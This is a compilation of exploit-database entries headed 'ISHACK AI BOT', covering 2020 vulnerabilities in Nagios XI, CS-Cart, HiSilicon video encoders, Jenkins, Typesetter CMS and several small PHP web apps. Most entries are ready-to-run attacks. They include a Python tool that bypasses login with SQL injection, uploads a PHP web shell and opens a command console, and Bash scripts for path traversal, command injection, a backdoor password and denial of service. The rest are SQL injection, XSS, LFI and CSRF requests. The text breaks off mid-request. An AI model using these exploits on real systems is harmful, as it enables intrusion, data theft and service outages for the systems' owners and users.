ISHACK AI BOT

# Exploit Title: Hotel Management System 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020-09-23 # Exploit Author: Eren Şimşek # Vendor Homepage: https://www.sourcecodester.com/php/14458/hotel-management-system-project-using-phpmysql.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip # Version: 1.0 # Tested on: Windows/Linux - XAMPP Server # CVE : N/A # Setup: pip3 install bs4 . # Exploit Code : import requests,sys,string,random from bs4 import BeautifulSoup def get_random_string(length): letters = string.ascii_lowercase result_str = ''.join(random.choice(letters) for i in range(length)) return result_str session = requests.session() Domain = "" RandomFileName = get_random_string(5)+".php" def Help(): print("[?] Usage: python AporlorRCE.py <Domain>") def Upload(): burp0_url = Domain+"/admin/ajax.php?action=save_category" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": " http://192.168.1.104/admin/index.php?page=categories", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------11915271121184037197158049421", "Connection": "close"} burp0_data = "-----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n1\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n1\r\n -----------------------------11915271121184037197158049421\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+RandomFileName+"\"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n -----------------------------11915271121184037197158049421--\r\n" try: Resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data) if Resp.text == "1": print("[+] Shell Upload Success") else: print("[-] Shell Upload Failed") except: print("[-] Request Failed") Help() def Login(): burp0_url = Domain+"/admin/ajax.php?action=login" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "*/*", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": " http://localhost/fos/admin/login.php", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} burp0_data = {"username": "' OR 1=1 #", "password": "' OR 1=1 #"} try: Resp = session.post(burp0_url, headers=burp0_headers,data=burp0_data) if Resp.text == "1": print("[+] Login Success") else: print("[+] Login Failed") except: print("[-] Request Failed") Help() def FoundMyRCE(): global FileName burp0_url = Domain+"/admin/index.php?page=categories" burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "tr,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} try: Resp = session.get(burp0_url, headers=burp0_headers) Soup = BeautifulSoup(Resp.text, "html5lib") Data = Soup.find_all("img") for MyRCE in Data: if RandomFileName in MyRCE["src"]: FileName = MyRCE["src"].strip("../assets/img/") print("[+] Found File Name: " + MyRCE["src"].strip("../assets/img/")) except: print("[-] Request Failed") Help() def Terminal(): while True: Command = input("Console: ") burp0_url = Domain+"/assets/img/"+FileName+"?cmd="+Command try: Resp = session.get(burp0_url) print(Resp.text) except KeyboardInterrupt: print("[+] KeyboardInterrupt Stop, Thanks For Use Aporlorxl23") except: print("[-] Request Error") if __name__ == "__main__": if len(sys.argv) == 2: Domain = sys.argv[1] Login() Upload() FoundMyRCE() Terminal() else: Help()

# Title: Seat Reservation System 1.0 - Unauthenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25762 # Description The file admin_class.php does not perform input validation on the username and password parameters. An attacker can send malicious input in the post request to /admin/ajax.php?action=login and bypass authentication, extract sensitive information etc. #POC 1) Navigate to the admin login page Example: http://192.168.1.72/seat_reservation/admin/login.php 2) Fill in dummy values for 'username' and 'password' fields and send the request via an HTTP intercept tool 3) Save the request to file. Example, seat_reservation_sqli.req POST /seat_reservation/admin/ajax.php?action=login HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 32 Origin: http://192.168.1.72 DNT: 1 Connection: close username=admin&password=dummy 4) Run SQLmap on the file, sqlmap -r seat_reservation_sqli.req --dbms=mysql --threads=10

# Exploit Title: CS-Cart authenticated RCE # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.3 # Vulnerability Type: authenticated RCE get PHP shells from http://pentestmonkey.net/tools/web-shells/php-reverse-shell edit IP && PORT Upload to file manager change the extension from .php to .phtml visit http://[victim]/skins/shell.phtml --> Profit. ...!

# Exploit Title: CS-Cart unauthenticated LFI # Date: 2020-09-22 # Exploit Author: 0xmmnbassel # Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html # Tested at: ver. 1.3.4 # Vulnerability Type: unauthenticated LFI http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]%00 example: http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00 http://www.site.com/classes/phpmailer/class.cs_phpmailer.php?classes_dir=../../../../../../../../../../../etc/passwd%00

#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload #Date: 2020-10-19 #Exploit Author: Ankita Pal & Saurav Shukla #Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/ #Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204 #Version: V1.0 #Tested on: Windows 10 + xampp v3.2.4 Proof of Concept::: Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php Step 2: Open Tour Package -> Create Malicious Request::: POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713 Content-Length: 1101 Origin: http://localhost:8081 Connection: close Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id Upgrade-Insecure-Requests: 1 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagename" Pack1 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagetype" Family -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagelocation" Manali -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packageprice" 21 -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagefeatures" Free -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packagedetails" Details -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="packageimage"; filename="file1.php" Content-Type: application/octet-stream <?php phpinfo(); ?> -----------------------------63824304340061635682865592713 Content-Disposition: form-data; name="submit" -----------------------------63824304340061635682865592713--

# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI. # Vulnerable Parameter : tfName # POC # Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload. POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 642 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1 Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i Upgrade-Insecure-Requests: 1 tfName=<img+src=a+onerror=alert(1)>&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d

# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI. # Vulnerable Parameter : id # POC POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1 Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i Content-Type: application/x-www-form-urlencoded Content-Length: 338 username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448

# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection # Date: 10-18-2020 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.nagios.com/products/nagios-xi/ # Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/ # Software Link: https://www.nagios.com/downloads/nagios-xi/ # Version: Nagios XI 5.7.3 # Tested on: Ubuntu 18.04 # Vulnerability Details # Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI. # Vulnerable Parameter : id # POC GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i

# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored) # Google Dork: N/A # Date: 2020/10/17 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Proof of Concept: 1 - Open URL http://localhost/jobportal/Employer/ManageJob.php 2 - Fill in the blanks with this payload: "><script>alert (1)</script> 3 - And click submit button.

# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020/10/18 # Exploit Author: Akıner Kısa # Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip # Version: 1.0 # Tested on: XAMPP # CVE : N/A Proof of Concept: 1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information. 2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button. 3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php

# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System # Google Dork: N/A # Date: 2020-10-17 # Exploit Author: j5oh # Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html # Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site # Version: 1.0 (REQUIRED) # Tested on: Windows 10 / Wamp Server # CVE : N/A The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php. XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php. # PoC: curl -d 'uto=1&tt=<script> alert("XSS"); </script>' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: https://www.szuray.com/ # Software Link: N/A # Version: up to 1.97 # Tested on: Linux # CVE: CVE-2020-24219 # Vendors: URayTech # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <filepath>" echo "Example: $0 1.2.3.4:8086 /box/box.ini" exit 1 fi curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \ || echo "ERROR: curl returned $?"

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24217 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <command>" exit 1 fi printf "creating uk.rar... " echo "$2" > uk.txt rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; } echo "done" rm uk.txt printf "uploading the RAR file... " if curl -s -F '[email protected]' http://$1 >/dev/null then echo "SUCCESS: remote command executed" rm uk.rar else echo "ERROR: $?" fi

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24217 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "Usage: $0 <server>[:<port>] <command>" exit 1 fi printf "executing the command... " if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null then echo "SUCCESS: remote command executed" else echo "ERROR: $?" fi

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - full admin access via backdoor password # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24215 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 1 ] then echo "Usage: $0 <server>[:<port>]" exit 1 fi printf "retrieving the password... " password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \ grep -oP '(?<=<html_password>).*?(?=</html_password>)') ret=$? if [ "$ret" -eq 0 ] then echo "the password is '$password'" echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'" else echo "ERROR: curl returned $ret" fi

# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in # Date: 8th October 2020 # Exploit Author: dmw0ng # Vendor Homepage: https://www.jenkins.io # Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip # Version: Jenkins 2.63 # Tested on: Ubuntu 18.04 / 20.04 # CVE : CVE-2019-1003030 GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0 Connection: close Upgrade-Insecure-Requests: 1 URL Encoding the following for RCE ```public class x { public x(){ "ping -c 1 xx.xx.xx.xx".execute() } } ``` to %70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d

#!/usr/bin/env bash # Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS) # Date: 2020-09-20 # Exploit Author: Alexei Kojenov # Vendor Homepage: multiple vendors # Software Link: N/A # Version: vendor-specific # Tested on: Linux # CVE: CVE-2020-24214 # Vendors: URayTech, J-Tech Digital, ProVideoInstruments # Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/ # Reference: https://www.kb.cert.org/vuls/id/896979 if [ "$#" -ne 2 ] then echo "usage: $0 <server> <RTSP port>" exit 1 fi server=$1 port=$2 printf "checking the target... " timeout 2 curl -s rtsp://$server:$port \ || { echo "ERROR: no RTSP server found at $server:$port"; exit 2; } printf "RTSP server detected\n" cseq=$(printf "0%0.s" {1..3000}) printf "sending the payload... " printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1 printf "done\n" sleep 1 printf "checking the target again... " if timeout 2 curl -s rtsp://$server:$port then echo "ERROR: the RTSP server still seems to be running :(" else echo "SUCCESS: the server is down" fi

# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via Guardian Name, Guardian Relation, Guardian Contact no, Address, City # Google Dork: N/A # Date: 2020-10-08 # Exploit Author: Kokn3t # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/hostel-management-system # Version: V 2.1 # Tested on: Windows 10, Kali 2020.1 # CVE : CVE-2020-25270 ######## Attack Vector ######## Install Hostel Management System V 2.1 1) User Module Login as user and go to "Book Hostel" (http:/localhost/hostel/book-hostel.php) and start booking. Add malicious script in these fields - "<script>alert('XSS');</script>" i. Guardian Name ii. Guardian Relation iii.Guardian Contact no iv. Address vi. City After that will get a prompt "Student Successfully register" and after pressing "See All", XSS will be triggered. 2) Admin Module Login in as Admin and go to "Management Students", and "View Full details" of booked student's record, XSS will be triggered also.

# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution # Exploit Author: Rodolfo "t0gu" Tavares # Contact: @t0guu (TW) # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: Linux / Apache # Category: WebApp # Google Dork: intext:"Powered by Typesetter" # Date: 2020-09-29 # CVE : CVE-2020-25790 ######## Description ######## # # The CMS Typesetter has functionality (web interface) where it is possible # through an account with privileges to perform uploads. Through this # functionality, it is possible to upload a .zip file that contains a # malicious .php file. In the same functionality, there is also the # possibility to extract the file through the same web interface, the # attacker only needs to extract the .zip that was previously loaded and # click on the malicious .php file to execute commands in the operating # system. # ######## Exploit with Poc ######## https://github.com/t0gu/CVE-2020-25790 ####### Code ####### # see the poc at https://github.com/t0gu/CVE-2020-25790 import argparse from bs4 import BeautifulSoup import requests import sys import re import urllib3 from urllib3.exceptions import InsecureRequestWarning banner = """ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗███████╗ █████╗ ██████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔═████╗ ╚════██╗██╔════╝╚════██║██╔══██╗██╔═████╗ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝██║██╔██║█████╗ █████╔╝███████╗ ██╔╝╚██████║██║██╔██║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ████╔╝██║╚════╝██╔═══╝ ╚════██║ ██╔╝ ╚═══██║████╔╝██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝ ███████╗███████║ ██║ █████╔╝╚██████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚═╝ ╚════╝ ╚═════╝ by: t0gu usage: main.py [-h] -p PASSWORD -l LOGIN -u URL ==> Exploit for CVE 2020-25790 optional arguments: -h, --help show this help message and exit -p PASSWORD, --password PASSWORD ==> admin password -l LOGIN, --login LOGIN ==> admin login -u URL, --url URL ==> main URL """ print(banner) menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790") menu.add_argument("-p", "--password", required=True, help="==> admin password") menu.add_argument("-l", "--login", required=True, help="==> admin login") menu.add_argument("-u", "--url", required=True, help="==> main URL") menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside") args = menu.parse_args() login = args.login password = args.password url = args.url file = args.file PROXIES = proxies = { "http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080", } class Exploit: def __init__(self, login, password, url, file): self.login = login self.password = password self.url = url self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari" self.file = open(file, 'rb') def get_nounce(self): try: url = self.url + "/Admin" r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False) data = r.text soap_obj = BeautifulSoup(data, 'html.parser') for inp in soap_obj.find_all("input"): for v in inp: nounce = v['value'] if nounce != None or nounce != "": return nounce except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_hash_folders(self): cookie_auth = self.get_cookies() hash_verified = self.get_verified() data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False) json_data = r.json() hash_dir = json_data['files'][2]['hash'] return hash_dir except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_cookies(self): nounce = self.get_nounce() if nounce: try: url = self.url + "/Admin" data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '', 'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '', 'remember': 'on', 'verified': ''} r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False, headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'}) cookie_admin = r.headers['Set-Cookie'] cookie_name = cookie_admin.split(':')[0].split('=')[0] cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0] if cookie_name == None or cookie_name == "": if cookie_value == None or cookie_value == "": print("==> Something went wrong while login") else: data = f"{cookie_name}={cookie_value};" return data except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e: print(f'==> Error while login {e}') def upload_zip(self): url = self.url + '/Admin_Finder' hash_verified = self.get_verified() hash_dir = self.get_hash_folders() auth_cookie = self.get_cookies() try: print(f"==> Uploading file: {self.file}") data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified} r = requests.post(url=url, verify=False, timeout=10, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file}) hash_file = r.json()['added'][0]['hash'] self.extract_file(auth_cookie, hash_file, hash_verified) except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e: print(f"==> Error while uploading {e}") def extract_file(self, auth_cookie, hash_file, hash_verified): data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file} try: url = self.url + "/Admin_Finder" r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) name_file = r.json()['added'][0]['name'] print(f"==> All Hashes are collected from: {name_file}") self.xpl(auth_cookie,name_file) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def xpl(self, auth_cookie, name_file): try: url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id" new_url = url.replace("index.php", "") print(f"==> Try to exploit: {new_url}") r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) pattern = r'<pre>(.*?)</pre>' m = re.search(pattern, r.text.replace("\n", "")) if m is not None and m != "": print(f"==> Vulnerable: {m.group(1)}") except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') def get_verified(self): try: url = self.url + "/Admin/Uploaded" auth_cookie = self.get_cookies() r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False) data = r.text pattern_regex = r'"verified":"(.*)"}' m = re.search(pattern_regex, data) if m is not None or m != "": return m.group(1) except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e: print(f'==> Error {e}') if __name__ == "__main__": obj = Exploit(login, password, url, file) obj.upload_zip()

# Exploit Title: Textpattern CMS 4.6.2 - Cross-site Request Forgery # Exploit Author: Alperen Ergel # Contact: @alpren_ae # Software Homepage: https://textpattern.com/ # Version : 4.6.2 # Tested on: windows 10 / xammp # Category: WebApp # Google Dork: intext:"Published with Textpattern CMS" # Date: 2020-10-29 ######## Description ######## # # 1-) Loggin administrator page # # 2-) Go admin > prefs > site # # 3-) All inputs vulnerable to CSRF # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /textpattern/textpattern/index.php?event=prefs HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/textpattern/textpattern/index.php Content-Type: application/x-www-form-urlencoded Content-Length: 1806 Connection: close Cookie: txp_login=localhost%2Ca170e235c4f2f59bb1300272c470807d; txp_login_public=a834cbdc8blocalhost; __atuvc=1%7C40 Upgrade-Insecure-Requests: 1 Submit=Save&sitename=victim+site&siteurl=victimurl.com&site_slogan=victimslogan&production_status=testing&timezone_key=Europe%2FBerlin&auto_dst=0& is_dst=0&dateformat=since&archive_dateformat=%25b+%25Oe%2C+%25I%3A%25M+%25p&permlink_mode=section_id_title&doctype=html5&logging=none&expire_logs_after=7& 